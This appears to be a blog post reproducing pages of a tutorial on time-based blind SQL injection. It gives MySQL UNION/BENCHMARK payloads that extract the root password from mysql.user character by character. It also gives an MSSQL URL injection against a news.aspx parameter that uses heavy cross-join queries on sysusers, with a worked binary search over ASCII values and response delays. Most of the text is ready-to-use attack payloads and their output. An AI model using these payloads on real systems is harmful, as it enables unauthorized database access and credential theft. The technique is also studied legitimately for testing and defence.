Time attack (MySQL)
When you can't see any kind of results, you must use the time attack.
In this example we will try to obtain the password of root user in mysql (if your have root
priviledges on mysql).
BENCHMARK function is used to sleep for some seconds.
3/9
Blind Sql Injection – Regular Expressions Attack
Syntax: BENCHMARK(how many times,thing to do).
When you use it in IF statement, you will be able to make time attack in MySQL;
SELECT 1,1 UNION SELECT
IF(SUBSTRING(Password,1,1)='a',BENCHMARK(100000,SHA1(1)),0) User,Password
FROM mysql.user WHERE User = ‘root’;
SELECT 1,1 UNION SELECT
IF(SUBSTRING(Password,1,1)='b',BENCHMARK(100000,SHA1(1)),0) User,Password
FROM mysql.user WHERE User = ‘root’;
SELECT 1,1 UNION SELECT
IF(SUBSTRING(Password,1,1)='c',BENCHMARK(100000,SHA1(1)),0) User,Password
FROM mysql.user WHERE User = ‘root’;
SELECT 1,1 UNION SELECT
IF(SUBSTRING(Password,1,1)='d',BENCHMARK(100000,SHA1(1)),0) User,Password
FROM mysql.user WHERE User = ‘root’;
And so on until you will see the BENCHMARK running (few more seconds delay). Now proceed
with the 2nd word of the password...
Time attack (MSSQL)
In this example we will try to obtain the username of the sysusers table.
A simple way to generate time delays is to take advantage of one of the biggest database
problems, that have made necessary the development of performance-tuning techniques;
heavy queries. All you need to generate a time delay is to access a table that has some
registers and to build a good query to force the engine to work. In other words, we need to
build a query ignoring what the performance best practices recommend. (This technique was
made by Chema Alonso, Microsoft Security MVP)
site.com/news.aspx?id=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as
sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6,
sysusers AS sys7, sysusers AS sys8)>1 and 300>(select top 1
ascii(substring(name,1,1)) from sysusers)
Positive result. The condition is true, and the response has a delay of 14 seconds. We actually
know that the ASCII value of the first username’s letter in the sysusers table is lower than
300.
site.com/news.aspx?id=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as
sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6,
sysusers AS sys7, sysusers AS sys8)>1 and 0 >(select top 1 ascii(substring(name,1,1))
from sysusers)
Negative Result. One-second response delay. We actually know than the ASCII value of the
first username’s letter in the sysusers table is higher than 0.
And so on for all the possibilities:
[...] >1 and 300 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 14
seconds → TRUE
[...] >1 and 0 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 1 second →
FALSE
[...] >1 and 150 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 14
seconds → TRUE
[...] >1 and 75 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 1 second →
4/9
Blind Sql Injection – Regular Expressions Attack
FALSE
[...] >1 and 100 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 1 second
→ FALSE
[...] >1 and 110 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 1 second
→ FALSE
[...] >1 and 120 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 14
seconds → TRUE
[...] >1 and 115 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 1 second
→ FALSE
[...] >1 and 118 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 1 second
→ FALSE
[...] >1 and 119 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 1 second
→ FALSE
Then the result is ASCII(119)='w'.
0 comments:
Post a Comment